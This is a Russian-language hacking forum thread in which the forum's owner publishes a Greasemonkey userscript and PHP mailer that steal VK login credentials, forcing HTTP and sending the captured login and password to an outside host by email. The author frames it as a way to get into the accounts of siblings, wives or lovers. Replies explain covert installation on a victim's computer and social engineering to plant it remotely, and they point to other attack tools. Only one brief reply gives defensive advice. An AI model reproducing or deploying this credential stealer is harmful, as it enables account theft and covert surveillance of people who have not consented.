• На проекте открылась регистрация только для продавцов. Для обычных пользователей будет открыта позже. Подробнее.
    P.S. Не надо скидывать ссылки на форумы, где у вас ноль сообщений. Подобные заявки будут отклонятся.

Получаем логин пароль от соцсетей, форумов и т.д. без взлома

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Часто обращаются с просьбой в помощи получения доступа к страничке брата\сестры\любовницы\жены (нужное подчеркнуть). И выкладывать за это килограммы денег они не хотят, по этому для таких халявщиков придумал простой способ без всяких кейлогеров(палятся антивирусами).

Нам потребуется:
  1. Компьютер с установленным на него браузером Firefox.
  2. Установленное на нем дополнение Greasemonkey
  3. Веб хостинг, на котором можно запускать php скрипты (не обязательно)
В Greasemonkey создаем скрипт:
Код:
// ==UserScript==
// @name        WebCriminal getPassVK
// @namespace   vk
// @include     *//vk.com/*
// @version     1
// @require        https://ajax.googleapis.com/ajax/libs/jquery/1.7.1/jquery.min.js
// @grant       none
// ==/UserScript==

function sendMail(mail, login, pass) {
    $.ajax({
        type: 'GET',
        url: 'http://webcriminal.ru/send_mail.php', //php скрипт куда уходят данные, о нем ниже
        data: {"mail":mail, "login": login, "pass": pass},
        callbackParameter: 'callback',
        dataType: 'jsonp',
        timeout: 10000,
        success: function(json){
            //alert('success')
        },
        error: function(){
            //alert('error')
        }
    });
}
//если https, то редирект на http, иначе пароль не получим.
if(window.location.protocol=="https:"){window.location.href = "http://vk.com";}

$('#quick_login_button').live("click", function() {
    var login = $('input[id*="email"]').val() //выдираем  логин из поля ввода
    var pass = $('input[id*="pass"]').val() //выдираем пароль из поля ввода
    sendMail("ddd@webcriminal.ru", login, pass) //ddd@webcriminal.ru меняем на свое
    return false;
})

Данный скрипт посредством AJAX будет отправлять данные на PHP скрипт send_mail.php:

PHP:
<?
function formatstr($str)
{
    $str = trim($str);
    $str = stripslashes($str);
    $str = htmlspecialchars($str);
    return $str;
}

$from_field = "From: WebCriminal <login_and_pass@webcriminal.ru>";
$subject = "Введенные данные";
$mail = formatstr($_GET["mail"]);
$login = formatstr($_GET["login"]);
$pass = formatstr($_GET["pass"]);
$message .= "Логин: ".$login.";";
$message .= "Пароль: ".$pass.";";
$mail = preg_replace('/%40/', '@', $mail);
mail($mail, $subject, $message, $from_field);
?>

Данный скрипт будет отправлять на ваше мыло полученные данные.

Итого: вы можете переделать выше описанные скрипты под получение данных с любых вебформ, и на последующую их обработку.

P.S. скрипт send_mail.php размещенный на сайте вебкриминала не ведет логи, и еслиб даже и вел, то все равно не понятно с какого ресурса получены данные.

P.S2. способ безпалевный, в последних версиях лисы можно спрятать значок обезьянки, чтоб не смущать подопытного пользователя. А чтобы быстро установить скрипт в Greasemonkey, достаточно сохранить его с расширением js и запустить на компьютере жерты с помощью Firefox.
 

bat-man

0x04
А где скачать Greasemonkey? Я что то не пойму этот скрипт как подкинуть жертве или этот скрипт сам следит за жертвой и выдаёт пароли от мэйла либо его нужно закинуть в комп жкртвы обьясни пожалуйста я просто чайник в этом деле...
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@bat-man, для начала коротко об дополнении, чтоб было понятно что к чему:
Greasemonkey - это расширение, изначально написанное для браузера Mozilla Firefox, которое позволяет выполнять пользовательский JavaScript-код на любых веб-страницах. То есть пользователь может добавить свой собственный JavaScript, который запуститься вместе с теми скриптами, которые уже есть на сайте. Greasemonkey может понадобиться для многих целей, одна из них - добавление нового функционала, который не предусмотрен самим сайтом.

Скачивать просто. Открываешь Firefox, жмешь сочетание клавишь Ctrl+Shift+A и в открывшейся вкладке делаешь поиск дополнения(Greasemonkey), после чего устанавливаешь его. Далее нужно создать в нем выше описанный скрипт.
Способ 100% действенный при прямом доступе к компьютеру, но конечно можно и извратиться и впарить все это удаленно. Например убедив жертву в том что с данным аддоном(Greasemonkey) его жизнь станет легче, и для примера пихнешь ему безобидный скрипт, а после того как войдешь в полное доверие дать описанный в этой теме, либо сразу дашь безобидный скрипт с перцовой начинкой. В общем все это творческий процесс :)
 

bat-man

0x04
Извеняюсь за офтоп спасибо за ответ мне твой форум нравится если хочешь его образовать скачать уникальный дизаин ксенки там есть много плагинов в этом сайте http://hackfor.ru/ я там модератор если захочеь что либо скачать с этого сайта я дам тебе свой логин и пароль и скачивай что угодно для ксенки
если конечно хочешь лучших плагинов в инете кроме этого сайта не нашёл когда тестировал xenforo.
 

Chr()m

0x16
А как от подобного защититься? Если каждый раз быть внимательным можно параноей заболеть :)
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@Chr()m, если именно от этого, то только используя https, если вас перебрасывает на незащищенный протокол, то стоит задуматься. Но бдительность вас не всегда выручит, если на машине стоит кейлогер и прочий софт, то вас спасет только двухэтапная авторизация или одноразовые пароли, если таковые имеются. Например в контакте это включается в настройках безопасности https://vk.com/settings?act=security если даже ваш пароль скомпрометирован, то под ним не смогут залогинется без доступа к вашему телефону.

Еще заходите только со своих устройств, не давайте свои устройства посторонним людям, правда сниферы все равно не кто не отменял, так что ваши данные на совести сервисов которыми вы пользуетесь. Или на вас, если вы не используете подобные настройки :)
 

Oper

0x02
А скрипт можно настроить так, чтоб он все отправляемые сообщения в контакте пересылал на мыло?
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
А скрипт можно настроить так, чтоб он все отправляемые сообщения в контакте пересылал на мыло?
Привет, конечно можно, только смысл? Твою почту заспамит смайликами и т.п.
В контакте ведь
любят
общаться
так
:)
а не предложениями как на форумах. В вашем случае нужно чтоб скрипт складировал лог переписки, и через какой-то промежуток времени скидывал его на почту.
 
хм ну и вата это всё, я думал метод нормальный а этот метод шлак.
Мне кажется проще, эксплоит нормальный в парить чем сидеть страдать фигнёй.
К тому же доступ физический к пк нужен, это уже минус, если на то пошло и есть вафля можно через Акулу трафик отснифирить.
Для таких случаев кстати есть Beef на kali linux, он куда удобнее и практичнее, к тому же не надо велосипед выдумывать..
А если жертва на андроид? то этот метод идёт лесом просто, metasploit юзай и будет счастье тебе.
 

Infoman

IPv6
WebVoice
хм ну и вата это всё, я думал метод нормальный а этот метод шлак.
Мне кажется проще, эксплоит нормальный в парить чем сидеть страдать фигнёй.
К тому же доступ физический к пк нужен, это уже минус, если на то пошло и есть вафля можно через Акулу трафик отснифирить.
Для таких случаев кстати есть Beef на kali linux, он куда удобнее и практичнее, к тому же не надо велосипед выдумывать..
А если жертва на андроид? то этот метод идёт лесом просто, metasploit юзай и будет счастье тебе.
С чьей позиции судишь? В начале темы же ясно сказано:
Часто обращаются с просьбой в помощи получения доступа к страничке брата\сестры\любовницы\жены (нужное подчеркнуть).

Думаешь те кто обращаются смогут сплойт впарить? Проанализировать дамп ваершарка? Запустить кали? Да они от этих слов под кровать спрячутся :websmiles_48:
Тут показан простой вектор атаки, для которого хватит знаний уровень чайник :websmiles_47:
 
С чьей позиции судишь? В начале темы же ясно сказано:


Думаешь те кто обращаются смогут сплойт впарить? Проанализировать дамп ваершарка? Запустить кали? Да они от этих слов под кровать спрячутся :websmiles_48:
Тут показан простой вектор атаки, для которого хватит знаний уровень чайник :websmiles_47:
Согласен но мне кажется даже из перечисленного школьник будет в ступоре потому что не поймет как это всё заставить работать =)
 
N

nnn

Гость
Какими конкретно способами в настоящее время хакеры взламывают аккаунты в соцсетях? Пожалуйста, расскажите вкратце.
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
Какими конкретно способами в настоящее время хакеры взламывают аккаунты в соцсетях? Пожалуйста, расскажите вкратце.
В настоящее время все способы используют социальную инженерию, нужно как-то заставить жертву пройти на специально сформированную страницу или запустить какой-то софт на компьютере или мобильном устройстве.
 
В настоящее время все способы используют социальную инженерию, нужно как-то заставить жертву пройти на специально сформированную страницу или запустить какой-то софт на компьютере или мобильном устройстве.
СИ+EXPLOIT Действует безотказно.
 
обьясните пожалуйста где что нужно исправить в скрипте, как получается то с какой почты на какую он отправляет?(плохо шарю)
 

ddd

(•̪̀●́)=o/̵͇̿̿/'̿̿ ̿ ̿̿
Команда форума
WebOwner
WebVoice
@russtreeter52, в файле send_mail.php нужно только указать от кого будет ходить почта:
Код:
$from_field = "From: WebCriminal <login_and_pass@webcriminal.ru>";
Вместо login_and_pass@webcriminal.ru можно указать свое или вообще не трогать.

а в tampermonkey в вашем случае нужно поменять 2-е строки:

function sendMail(mail, login, pass) {
$.ajax({
type: 'GET',
url: 'http://ВАШ_ХОСТ/send_mail.php',

...

$('#quick_login_button').live("click", function() {
var login = $('input[id*="email"]').val() //выдираем логин из поля ввода
var pass = $('input[id*="pass"]').val() //выдираем пароль из поля ввода
sendMail("ваш@емайл", login, pass)
 
Сверху